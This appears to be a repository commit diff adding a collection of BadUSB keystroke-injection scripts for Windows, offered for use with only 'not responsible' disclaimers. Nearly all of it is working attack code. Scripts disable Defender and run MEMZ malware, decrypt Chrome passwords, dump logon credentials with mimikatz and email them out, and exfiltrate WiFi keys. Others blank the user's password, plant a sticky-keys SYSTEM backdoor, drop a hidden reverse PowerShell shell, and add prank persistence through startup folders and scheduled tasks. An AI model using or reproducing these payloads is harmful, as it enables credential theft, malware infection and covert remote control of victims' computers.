106	+	STRING Dim tmpDir: Set tmpDir = oFSo.GetFolder(PRFL + "\Music\tmp")
107	+	ENTER
108	+	STRING tmpDir.attributes = tmpDir.attributes + 2
109	+	ENTER
110	+	DELAY 100
111	+	CTRL z
112	+	ENTER
113	+	STRING wscript hidefiles.vbs
114	+	ENTER
115	+	STRING copy con rickyou.vbs
116	+	ENTER
117	+	STRING Dim oShell: Set oShell = CreateObject("WScript.Shell")
118	+	ENTER
119	+	STRING Dim PRFL: PRFL = oShell.ExpandEnvironmentStrings("%USERPROFILE%")
120	+	ENTER
121	+	STRING While true
122	+	ENTER
123	+	STRING Dim oPlayer: Set oPlayer = CreateObject("WMPlayer.OCX")
124	+	ENTER
125	+	STRING oPlayer.URL = PRFL + "\Music\tmp\rick.mp3"
126	+	ENTER
127	+	STRING oPlayer.controls.play
128	+	ENTER
129	+	STRING While oPlayer.playState <> 1 ' 1 = Stopped
130	+	ENTER
131	+	STRING WScript.Sleep 100
132	+	ENTER
133	+	STRING Wend
134	+	ENTER
135	+	STRING oPlayer.close
136	+	ENTER
137	+	STRING Wend
138	+	ENTER
139	+	DELAY 100
140	+	CTRL z
141	+	ENTER
142	+	STRING copy con volup.vbs
143	+	ENTER
144	+	STRING CreateObject("WScript.Shell").Run "%USERPROFILE%\Music\tmp\volup.bat", 0, False
145	+	ENTER
146	+	DELAY 100
147	+	CTRL z
148	+	ENTER
149	+	STRING copy rickyou.vbs "%USERPROFILE%\Music\tmp\rickyou.vbs"
150	+	ENTER
151	+	STRING move rickyou.vbs "%SystemDrive%\Users\%UserName%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rickyou.vbs"
152	+	ENTER
153	+	STRING copy volup.vbs "%USERPROFILE%\Music\tmp\volup.vbs"
154	+	ENTER
155	+	STRING move volup.vbs "%SystemDrive%\Users\%UserName%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\volup.vbs"
156	+	ENTER
157	+	STRING del dlrick.vbs
158	+	ENTER
159	+	STRING del dlnir.vbs
160	+	ENTER
161	+	STRING del hidefiles.vbs
162	+	ENTER
163	+	STRING del %USERPROFILE%\Music\tmp\NirCmd.chm
164	+	ENTER
165	+	STRING del %USERPROFILE%\Music\tmp\nircmdc.exe
166	+	ENTER
167	+	STRING del %USERPROFILE%\Music\tmp\nircmd-x64.zip
168	+	ENTER
169	+	STRING exit
170	+	ENTER
171	+	DELAY 250
172	+	GUI r
173	+	DELAY 250
174	+	STRING taskschd.msc
175	+	ENTER
176	+	DELAY 2000
177	+	ALT a
178	+	STRING b
179	+	DELAY 1000
180	+	STRING rr
181	+	ENTER
182	+	UP
183	+	ENTER
184	+	STRING s
185	+	TAB
186	+	TAB
187	+	STRING 4801
188	+	ENTER
189	+	ENTER
190	+	STRING wscript
191	+	TAB
192	+	TAB
193	+	STRING %USERPROFILE%\Music\tmp\rickyou.vbs
194	+	ENTER
195	+	ENTER
196	+	DELAY 500
197	+	ALT a
198	+	STRING b
199	+	DELAY 1000
200	+	STRING vu
201	+	ENTER
202	+	UP
203	+	ENTER
204	+	STRING s
205	+	TAB
206	+	TAB
207	+	STRING 4801
208	+	ENTER
209	+	ENTER
210	+	STRING wscript
211	+	TAB
212	+	TAB
213	+	STRING %USERPROFILE%\Music\tmp\volup.vbs
214	+	ENTER
215	+	ENTER
216	+	DELAY 500
217	+	ALT f
218	+	STRING x
219	+

■ ■ ■ ■ ■ ■

BadUsb-Collection/FUN/WordPrank.txt

1	+	REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
2	+	REM Description: Basically changes the Auto-Correction and makes "and" being corrected to "nad". But you can put any word you want.
3	+	REM Version: 1.0
4	+	REM Category: FUN
5	+	DELAY 2000
6	+	GUI r
7	+	DELAY 200
8	+	STRING winword
9	+	ENTER
10	+	DELAY 1000
11	+	ENTER
12	+	DELAY 200
13	+	ALT q
14	+	DELAY 300
15	+	STRING options spelling
16	+	DELAY 500
17	+	ENTER
18	+	DELAY 200
19	+	TAB
20	+	DELAY 200
21	+	ENTER
22	+	DELAY 200
23	+	STRING and
24	+	DELAY 200
25	+	TAB
26	+	STRING nad
27	+	DELAY 200
28	+	ALT a
29	+	DELAY 200
30	+	ENTER
31	+	DELAY 200
32	+	SHIFT TAB
33	+	DELAY 200
34	+	ENTER
35	+	DELAY 200
36	+	ALT F4
37	+	DELAY 200
38	+

■ ■ ■ ■ ■ ■

BadUsb-Collection/FUN/justdance.txt

1	+	REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
2	+	REM Description: Sets volume to 100% and plays "just dance remix". And yes I know, that the Set-Volume command exists twice. It has to be run twice for it to work.
3	+	REM Version: 1.0
4	+	REM Category: FUN
5	+	DELAY 700
6	+	GUI r
7	+	DELAY 650
8	+	STRING powershell Start-Process powershell -Verb runAs
9	+	DELAY 650
10	+	ENTER
11	+	DELAY 650
12	+	LEFTARROW
13	+	DELAY 650
14	+	ENTER
15	+	DELAY 650
16	+	STRING Set-Volume 100; Function Set-Volume { Param([Parameter(Mandatory=$true)][ValidateRange(0,100)][Int]$volume); $keyPresses = [Math]::Ceiling( $volume / 2 ); $obj = New-Object -ComObject WScript.Shell; 1..50 \| ForEach-Object { $obj.SendKeys( [char] 174 ) }; for( $i = 0; $i -lt $keyPresses; $i++ ) {$obj.SendKeys( [char] 175 )}; }
17	+	DELAY 650
18	+	ENTER
19	+	DELAY 650
20	+	STRING Set-Volume 100; Function Set-Volume { Param([Parameter(Mandatory=$true)][ValidateRange(0,100)][Int]$volume); $keyPresses = [Math]::Ceiling( $volume / 2 ); $obj = New-Object -ComObject WScript.Shell; 1..50 \| ForEach-Object { $obj.SendKeys( [char] 174 ) }; for( $i = 0; $i -lt $keyPresses; $i++ ) {$obj.SendKeys( [char] 175 )}; }
21	+	DELAY 650
22	+	ENTER
23	+	DELAY 550
24	+	STRING Start-Process -WindowStyle Hidden "https://www.youtube.com/watch?v=7W9IOhk1-z4"
25	+	DELAY 500
26	+	ENTER

■ ■ ■ ■ ■ ■

BadUsb-Collection/Malware/MemzMalware.txt

1	+	REM Author: UNC0V3R3D
2	+	REM Description: I am not responsible for any DAMAGE!! Opens PowerShell, downloads File and runs File to create chaos. I
3	+	REM Version: 1.0
4	+	REM Category: Execution
5	+	DEFAULT_DELAY 700
6	+	DELAY 500
7	+	GUI r
8	+	DELAY 200
9	+	STRING powershell Start-Process powershell -Verb runAs
10	+	DELAY 800
11	+	LEFTARROW
12	+	DELAY 680
13	+	ENTER
14	+	DELAY 800
15	+	REM Disables Windows Defender
16	+	STRING Set-MpPreference -DisableRealtimeMonitoring $true
17	+	DELAY 200
18	+	ENTER
19	+	DELAY 750
20	+	REM Please put a full path Example: (C:\user\desktop) and dont write the "\MEMZ.exe" because its already there
21	+	STRING $Path = "Path to store file here"
22	+	DELAY 200
23	+	ENTER
24	+	DELAY 500
25	+	REM Basically downloads the MEMZ.exe malware
26	+	STRING $webClient = New-Object System.Net.WebClient; $webClient.DownloadFile("https://github.com/vvinlind/MEMZ/blob/master/MEMZ.exe", "$Path\MEMZ.exe")
27	+	DELAY 200
28	+	ENTER
29	+	DELAY 500
30	+	REM Executes MEMZ.exe
31	+	STRING Start-Process -FilePath "$Path\MEMZ.exe"
32	+	DELAY 500
33	+	ENTER
34	+	DELAY 200
35	+	STRING exit
36	+
37	+
38	+

■ ■ ■ ■ ■ ■

BadUsb-Collection/PasswordStealing/BadUSB_windowsPassDisabler.txt

1	+	REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
2	+	REM Description: Disables the Windows Password
3	+	REM Version: 1.0
4	+	REM Category: Passwords
5	+	DELAY 1500
6	+	GUI d
7	+	DELAY 500
8	+	GUI r
9	+	DELAY 500
10	+	STRING powershell.exe -windowstyle hidden
11	+	DELAY 200
12	+	CTRL SHIFT ENTER
13	+	DELAY 2000
14	+	LEFT
15	+	DELAY 150
16	+	ENTER
17	+	DELAY 2000
18	+	STRING net user $env:USERNAME *
19	+	ENTER
20	+	DELAY 150
21	+	ENTER
22	+	DELAY 150
23	+	ENTER
24	+	DELAY 200
25	+	STRING exit
26	+	ENTER
27	+	CAPSLOCK
28	+	DELAY 150
29	+	CAPSLOCK
30	+	DELAY 150
31	+	CAPSLOCK
32	+	DELAY 150
33	+	CAPSLOCK
34	+	DELAY 2000
35	+	CAPSLOCK
36	+	DELAY 150
37	+	CAPSLOCK
38	+	DELAY 150
39	+	CAPSLOCK
40	+	DELAY 150
41	+	CAPSLOCK
42	+
43	+

■ ■ ■ ■ ■ ■

BadUsb-Collection/PasswordStealing/ChromePasswords.txt

1	+	REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
2	+	REM Description: Grabs saved Passwords from Chrome
3	+	REM Version: 1.0
4	+	REM Category: Passwords
5	+	DELAY 5000
6	+	GUI r
7	+	DELAY 250
8	+	STRING powershell
9	+	ENTER
10	+	DELAY 2500
11	+	STRING pwsh
12	+	ENTER
13	+	DELAY 2500
14	+	STRING $d=Add-Type -A System.Security
15	+	ENTER
16	+	STRING $p='public static'
17	+	ENTER
18	+	STRING $g=""")]$p extern"
19	+	ENTER
20	+	STRING $i='[DllImport("winsqlite3",EntryPoint="sqlite3_'
21	+	ENTER
22	+	STRING $m="[MarshalAs(UnmanagedType.LP"
23	+	ENTER
24	+	STRING $q='(s,i)'
25	+	ENTER
26	+	STRING $f='(p s,int i)'
27	+	ENTER
28	+	STRING $z=$env:LOCALAPPDATA+'\Google\Chrome\User Data'
29	+	ENTER
30	+	STRING $u=[Security.Cryptography.ProtectedData]
31	+	ENTER
32	+	STRING Add-Type "using System.Runtime.InteropServices;using p=System.IntPtr;$p class W{$($i)open$g p O($($m)Str)]string f,out p d);$($i)prepare16_v2$g p P(p d,$($m)WStr)]string l,int n,out p s,p t);$($i)step$g p S(p s);$($i)column_text16$g p C$f;$($i)column_bytes$g int Y$f;$($i)column_blob$g p L$f;$p string T$f{return Marshal.PtrToStringUni(C$q);}$p byte[] B$f{var r=new byte[Y$q];Marshal.Copy(L$q,r,0,Y$q);return r;}}"
33	+	ENTER
34	+	STRING $s=[W]::O("$z\\Default\\Login Data",[ref]$d)
35	+	ENTER
36	+	STRING $l=@()
37	+	ENTER
38	+	STRING if($host.Version-like"7*"){$b=(gc "$z\\Local State"\|ConvertFrom-Json).os_crypt.encrypted_key
39	+	ENTER
40	+	STRING $x=[Security.Cryptography.AesGcm]::New($u::Unprotect([Convert]::FromBase64String($b)[5..($b.length-1)],$n,0))}$_=[W]::P($d,"SELECT*FROM logins WHERE blacklisted_by_user=0",-1,[ref]$s,0)
41	+	ENTER
42	+	STRING for(;!([W]::S($s)%100)){$l+=[W]::T($s,0),[W]::T($s,3)
43	+	ENTER
44	+	STRING $c=[W]::B($s,5)
45	+	ENTER
46	+	STRING try{$e=$u::Unprotect($c,$n,0)}catch{if($x){$k=$c.length
47	+	ENTER
48	+	STRING $e=[byte[]]::new($k-31)
49	+	ENTER
50	+	STRING $x.Decrypt($c[3..14],$c[15..($k-17)],$c[($k-16)..($k-1)],$e)}}$l+=($e\|%{[char]$_})-join''}
51	+	ENTER
52	+	STRING $r=[Convert]::ToBase64String([Text.Encoding]::ASCII.GetBytes(($l)-join','))
53	+	ENTER
54	+	STRING start-process "chrome" "--headless http://localhost:8000/?$r"
55	+	ENTER
56	+	DELAY 1000
57	+	STRING exit
58	+	ENTER
59	+	DELAY 250
60	+	STRING exit
61	+	ENTER
62	+

■ ■ ■ ■ ■ ■

BadUsb-Collection/PasswordStealing/Show_Saved_Passwords.txt

1	+	REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
2	+	REM Description: Shows all saved passwords.
3	+	REM Version: 1.0
4	+	REM Category: Passwords
5	+	DELAY 900
6	+	GUI r
7	+	DELAY 1000
8	+	STRING powershell
9	+	ENTER
10	+	DELAY 1000
11	+	STRING mkdir \temp ; cd \temp ; Invoke-WebRequest -Headers @{'Referer' = 'http://www.nirsoft.net/utils/web_browser_password.html'} -Uri http://www.nirsoft.net/toolsdownload/webbrowserpassview.zip -OutFile wbpv.zip ; Invoke-WebRequest -Uri https://www.7-zip.org/a/7za920.zip -OutFile 7z.zip ; Expand-Archive 7z.zip ; .\7z\7za.exe e wbpv.zip
12	+	ENTER
13	+	DELAY 5000
14	+	STRING wbpv28821@
15	+	ENTER
16	+	STRING .\WebBrowserPassView.exe
17	+	ENTER
18	+	DELAY 3000
19	+	CTRL A
20	+	CTRL S
21	+	DELAY 1000
22	+	STRING export.html
23	+	TAB
24	+	STRING h
25	+	ENTER
26	+	DELAY 1000
27	+	ALT F4
28	+	DELAY 1000
29	+	STRING Start-Process msedge.exe 'file:///C:/temp/export.htm --inprivate'
30	+	ENTER
31	+	DELAY 2000
32	+	ALT TAB
33	+	DELAY 1000
34	+	STRING cd \
35	+	ENTER
36	+	STRING rmdir -R \temp
37	+	ENTER
38	+	STRING EXIT
39	+	ENTER

■ ■ ■ ■ ■ ■

BadUsb-Collection/PasswordStealing/Simple_User_Password_Grabber.txt

1	+	REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
2	+	REM Description: Grabs the current Windows User password.
3	+	REM Version: 1.0
4	+	REM Category: Passwords
5	+	DEFAULT_DELAY 450
6	+	DELAY 1500
7	+	GUI r
8	+	STRING powershell
9	+	CTRL-SHIFT ENTER
10	+	DELAY 600
11	+	ALT y
12	+	STRING Set-MpPreference -ExclusionPath C:\Users
13	+	ENTER
14	+	STRING exit
15	+	ENTER
16	+	GUI r
17	+	STRING cmd
18	+	CTRL-SHIFT ENTER
19	+	DELAY 600
20	+	ALT y
21	+	STRING powershell (new-object System.Net.WebClient).DownloadFile('LINK TO MIMIKATZ.EXE DOWNLOAD HERE','%temp%\pw.exe')
22	+	ENTER
23	+	DELAY 4000
24	+	STRING %TEMP%\pw.exe > c:\pwlog.txt & type pwlog.txt;
25	+	ENTER
26	+	STRING privilege::debug
27	+	ENTER
28	+	STRING sekurlsa::logonPasswords full
29	+	ENTER
30	+	STRING exit
31	+	ENTER
32	+	STRING del %TEMP%\pw.exe
33	+	ENTER
34	+	STRING exit
35	+	ENTER
36	+	GUI r
37	+	STRING powershell
38	+	CTRL-SHIFT ENTER
39	+	DELAY 600
40	+	ALT y
41	+	STRING Remove-MpPreference -ExclusionPath C:\Users
42	+	ENTER
43	+	STRING $SMTPServer = 'smtp.gmail.com'
44	+	ENTER
45	+	STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
46	+	ENTER
47	+	STRING $SMTPInfo.EnableSsl = $true
48	+	ENTER
49	+	STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('THE-PART-OF-YOUR-EMAIL-BEFORE-THE-@
50	+	SHIFT 2
51	+	STRING gmail.com', 'PASSWORDHERE');
52	+	ENTER
53	+	STRING $ReportEmail = New-Object System.Net.Mail.MailMessage
54	+	ENTER
55	+	STRING $ReportEmail.From = 'THE-PART-OF-YOUR-EMAIL-BEFORE-THE-@
56	+	SHIFT 2
57	+	STRING gmail.com'
58	+	ENTER
59	+	STRING $ReportEmail.To.Add('THE-PART-OF-RECEIVERS-EMAIL-BEFORE-THE-@
60	+	SHIFT 2
61	+	STRING gmail.com')
62	+	ENTER
63	+	STRING $ReportEmail.Subject = 'Hello from the ducky'
64	+	ENTER
65	+	STRING $ReportEmail.Body = 'Attached is your duck report.'
66	+	ENTER
67	+	STRING $ReportEmail.Attachments.Add('c:\pwlog.txt')
68	+	ENTER
69	+	STRING $SMTPInfo.Send($ReportEmail)
70	+	ENTER
71	+	DELAY 4000
72	+	STRING exit
73	+	ENTER
74	+	GUI r
75	+	STRING powershell
76	+	CTRL-SHIFT ENTER
77	+	DELAY 600
78	+	ALT y
79	+	STRING del c:\pwlog.txt
80	+	ENTER
81	+	STRING Remove-Item (Get-PSreadlineOption).HistorySavePath
82	+	ENTER
83	+	STRING exit
84	+	ENTER
85	+	GUI l
86	+

■ ■ ■ ■ ■ ■

BadUsb-Collection/PasswordStealing/StealWifiKeys.txt

1	+	REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
2	+	REM Description: Steals all of the saved Wifi Passwords and stores them into a file.
3	+	REM Version: 1.0
4	+	REM Category: Passwords
5	+	DELAY 500
6	+	WINDOWS d
7	+	DELAY 500
8	+	WINDOWS r
9	+	DELAY 500
10	+	STRING powershell Start-Process powershell -Verb runAs
11	+	ENTER
12	+	DELAY 800
13	+	LEFTARROW
14	+	ENTER
15	+	DELAY 800
16	+	ALT y
17	+	DELAY 500
18	+	GUI UP
19	+	DELAY 600
20	+	STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss');$userDir = (Get-ChildItem env:\userprofile).value + '\Walkuer Ghost Report ' + $folderDateTime;$fileSaveDir = New-Item ($userDir) -ItemType Directory;$date = get-date;netsh wlan export profile key=clear folder=$fileSaveDir;Compress-Archive -Path $fileSaveDir -DestinationPath C:PUT PATH HERE\ResultsPassword.zip ; exit
21	+	ENTER

■ ■ ■ ■ ■ ■

BadUsb-Collection/PasswordStealing/StealWifiKeys_Email.txt

1	+	REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
2	+	REM Description: Steals all of the saved Wifi Passwords and sends them via an outlook email.
3	+	REM Version: 1.0
4	+	REM Category: Passwords
5	+	DEFAULT_DELAY 600
6	+	DELAY 500
7	+	WINDOWS r
8	+	DELAY 500
9	+	STRING cmd
10	+	ENTER
11	+	DELAY 200
12	+	STRING cd %USERPROFILE% & netsh wlan show profiles \| findstr "All" > a.txt
13	+	ENTER
14	+	STRING echo SETLOCAL EnableDelayedExpansion^
15	+	ENTER
16	+	ENTER
17	+	STRING for /f "tokens=5*" %%i in (a.txt) do (^
18	+	ENTER
19	+	ENTER
20	+	STRING set val=%%i %%j^
21	+	ENTER
22	+	ENTER
23	+	STRING if "!val:~-1!" == " " set val=!val:~0,-1!^
24	+	ENTER
25	+	ENTER
26	+	STRING echo !val!^>^>b.txt) > filter.bat
27	+	ENTER
28	+	STRING filter.bat
29	+	DELAY 300
30	+	ENTER
31	+	STRING (for /f "tokens=*" %i in (b.txt) do @echo SSID: %i & netsh wlan show profiles name="%i" key=clear \| findstr /c:"Key Content" & echo.) > Log.txt
32	+	ENTER
33	+	DELAY 1000
34	+	STRING exit
35	+	DELAY 500
36	+	ENTER
37	+	DELAY 1000
38	+	WINDOWS r
39	+	DELAY 500
40	+	STRING powershell
41	+	ENTER
42	+	DELAY 1000
43	+	STRING del .\a.txt
44	+	ENTER
45	+	STRING del .\b.txt
46	+	ENTER
47	+	STRING del .\filter.bat
48	+	ENTER
49	+	STRING $SMTPServer = 'smtp-mail.outlook.com'
50	+	ENTER
51	+	STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
52	+	ENTER
53	+	STRING $SMTPInfo.EnableSSL = $true
54	+	ENTER
55	+	STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('EMAIL HERE', 'EMAIL PASSWORD HERE')
56	+	ENTER
57	+	STRING $ReportEmail = New-Object System.Net.Mail.MailMessage
58	+	ENTER
59	+	STRING $ReportEmail.From = 'YOUR EMAIL'
60	+	ENTER
61	+	STRING $ReportEmail.To.Add('YOUR EAMIL')
62	+	ENTER
63	+	STRING $ReportEmail.Subject = 'WiFi key grabber'
64	+	ENTER
65	+	STRING $ReportEmail.Body = (Get-Content Log.txt \| out-string)
66	+	ENTER
67	+	STRING $SMTPInfo.Send($ReportEmail)
68	+	ENTER
69	+	DELAY 3000
70	+	STRING del Log.txt
71	+	DELAY 500
72	+	STRING exit
73	+	ENTER
74	+

■ ■ ■ ■ ■ ■

BadUsb-Collection/PasswordStealing/StealWifiKeys_onUSB.txt

1	+	REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
2	+	REM Description: Steals all of the saved Wifi Passwords and stores them into a USB device of your choice.
3	+	REM Version: 1.0
4	+	REM Category: Passwords
5	+	DELAY 750
6	+	WINDOWS d
7	+	DELAY 1000
8	+	WINDOWS r
9	+	DELAY 900
10	+	STRING powershell Start-Process powershell -Verb runAs
11	+	ENTER
12	+	DELAY 750
13	+	LEFTARROW
14	+	ENTER
15	+	DELAY 900
16	+	ALT y
17	+	DELAY 900
18	+	GUI UP
19	+	DELAY 900
20	+	STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss');$userDir = (Get-ChildItem env:\userprofile).value + '\Walkuer Ghost Report ' + $folderDateTime;$fileSaveDir = New-Item ($userDir) -ItemType Directory;$date = get-date;netsh wlan export profile key=clear folder=$fileSaveDir;Compress-Archive -Path $fileSaveDir -DestinationPath File path on USB device here

■ ■ ■ ■ ■ ■

BadUsb-Collection/Remote-Access/CommandLineBackdoor.txt

1	+	REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
2	+	REM Description: Creates a command prompt "backdoor" that can be launched in almost any "secure" Windows environment,
3	+	REM (Lock Screen for example) via Sticky Keys shortcuts (Pressing shift five times) or the keyboard combination Alt+Shift+PrtScr.
4	+	REM This then results in launching the command prompt in the same account as the current environment, i.e. SYSTEM or your user account.
5	+	REM Version: 1.0
6	+	REM Category: Remote_Access
7	+	REM plug in second USB in before the Flipper
8	+	DELAY 3000
9	+	CONTROL ESCAPE
10	+	DELAY 500
11	+	STRING notepad
12	+	DELAY 250
13	+	ENTER
14	+	DELAY 750
15	+	STRING @echo off
16	+	ENTER
17	+	STRING :init
18	+	ENTER
19	+	STRING setlocal DisableDelayedExpansion
20	+	ENTER
21	+	STRING set cmdInvoke=1
22	+	ENTER
23	+	STRING set winSysFolder=System32
24	+	ENTER
25	+	STRING set "batchPath=%~0"
26	+	ENTER
27	+	STRING for %%k in (%0) do set batchName=%%~nk
28	+	ENTER
29	+	STRING set "TEMPVBS=%temp%\OEgetPriv_run.vbs"
30	+	ENTER
31	+	STRING setlocal EnableDelayedExpansion
32	+	ENTER
33	+	STRING :checkPrivileges
34	+	ENTER
35	+	STRING NET FILE 1>NUL 2>NUL
36	+	ENTER
37	+	STRING if '%errorlevel%' == '0' (goto gotPrivileges) else (goto getPrivileges)
38	+	ENTER
39	+	STRING :getPrivileges
40	+	ENTER
41	+	STRING if '%1'=='ELEV' (echo ELEV & shift /1 & goto gotPrivileges)
42	+	ENTER
43	+	STRING echo Set UAC = CreateObject^("Shell.Application"^) > "%TEMPVBS%"
44	+	ENTER
45	+	STRING echo args = "ELEV " >> "%TEMPVBS%"
46	+	ENTER
47	+	STRING echo For Each strArg in WScript.Arguments >> "%TEMPVBS%"
48	+	ENTER
49	+	STRING echo args = args ^& strArg ^& " " >> "%TEMPVBS%"
50	+	ENTER
51	+	STRING echo Next>> "%TEMPVBS%"
52	+	ENTER
53	+	STRING if '%cmdInvoke%'=='1' goto InvokeCmd
54	+	ENTER
55	+	STRING echo UAC.ShellExecute "!batchPath!", args, "", "runas", 1 >> "%TEMPVBS%"
56	+	ENTER
57	+	STRING goto ExecElevation
58	+	ENTER
59	+	STRING :InvokeCmd
60	+	ENTER
61	+	STRING echo args = "/c """ + "!batchPath!" + """ " + args >> "%TEMPVBS%"
62	+	ENTER
63	+	STRING echo UAC.ShellExecute "%SystemRoot%\%winSysFolder%\cmd.exe", args, "", "runas", 1 >> "%TEMPVBS%"
64	+	ENTER
65	+	STRING :ExecElevation
66	+	ENTER
67	+	STRING "%SystemRoot%\%winSysFolder%\WScript.exe" "%TEMPVBS%" %*
68	+	ENTER
69	+	STRING exit /B
70	+	ENTER
71	+	STRING :gotPrivileges
72	+	ENTER
73	+	STRING setlocal & cd /d "%~dp0."
74	+	ENTER
75	+	STRING if '%1'=='ELEV' (del "%TEMPVBS%" 1>nul 2>nul & shift /1)
76	+	ENTER
77	+	STRING reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /ve /f && reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v "Debugger" /t REG_SZ /d "cmd.exe" /f && cls && echo Payload Installed Successfully && pause && goto end
78	+	ENTER
79	+	STRING cls
80	+	ENTER
81	+	STRING echo Payload Install Failed
82	+	ENTER
83	+	STRING pause
84	+	ENTER
85	+	STRING :end
86	+	ENTER
87	+	STRING del /F /Q "%~0" && exit
88	+	CONTROL s
89	+	DELAY 500
90	+	STRING %temp%\run.bat
91	+	TAB
92	+	STRING a
93	+	ENTER
94	+	DELAY 250
95	+	ALT F4
96	+	DELAY 250
97	+	CONTROL ESCAPE
98	+	DELAY 500
99	+	STRING %temp%\run.bat
100	+	ENTER

■ ■ ■ ■ ■ ■

BadUsb-Collection/Remote-Access/ReversePowershell.txt

1	+	REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
2	+	REM Description: Reverse-PowerShell Windows. I am not responsible for your actions.
3	+	REM Version: 1.0
4	+	REM Category: Remote_Access
5	+	DELAY 750
6	+	GUI r
7	+	DELAY 1000
8	+	STRING powershell Start-Process notepad -Verb runAs
9	+	ENTER
10	+	DELAY 750
11	+	ALT y
12	+	DELAY 750
13	+	ENTER
14	+	ALT SPACE
15	+	DELAY 1000
16	+	STRING m
17	+	DELAY 1000
18	+	DOWNARROW
19	+	REPEAT 100
20	+	ENTER
21	+	STRING Add-Content “$env:TEMP\34593.ps1” ‘$c = New-Object System.Net.Sockets.TCPClient(“”,);$s = $c.GetStream();[byte[]]$b = 0..255\|%{0};while(($i = $s.Read($b, 0, $b.Length)) -ne 0){;$d = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$sb = (iex $d 2>&1 \| Out-String );$sb2 = $sb + “PS ” + (pwd).Path + “> “;$sby = ([text.encoding]::ASCII).GetBytes($sb2);$s.Write($sby,0,$sby.Length);$s.Flush()};$c.Close()’
22	+	ENTER
23	+	DELAY 750
24	+	STRING Set-MpPreference -DisableRealtimeMonitoring $true
25	+	DELAY 500
26	+	ENTER
27	+	DELAY 750
28	+	STRING start-Process powershell.exe -windowstyle hidden “$env:TEMP\34593.ps1”
29	+	ENTER
30	+	STRING Remove-Item $MyINvocation.InvocationName
31	+	ENTER
32	+	CTRL s
33	+	DELAY 1000
34	+	STRING C:\Windows\config-34593.ps1
35	+	ENTER
36	+	DELAY 1000
37	+	ALT F4
38	+	DELAY 750
39	+	GUI r
40	+	DELAY 750
41	+	STRING powershell Start-Process cmd -Verb runAs
42	+	ENTER
43	+	DELAY 750
44	+	ALT y
45	+	DELAY 1000
46	+	STRING mode con:cols=14 lines=1
47	+	ENTER
48	+	ALT SPACE
49	+	DELAY 750
50	+	STRING m
51	+	DELAY 750
52	+	DOWNARROW
53	+	REPEAT 100
54	+	ENTER
55	+	STRING powershell Set-ExecutionPolicy ‘Unrestricted’ -Scope CurrentUser -Confirm:$false
56	+	ENTER
57	+	DELAY 750
58	+	STRING powershell.exe -windowstyle hidden -File C:\Windows\config-34593.ps1
59	+	ENTER
60	+

Added a lot of new files!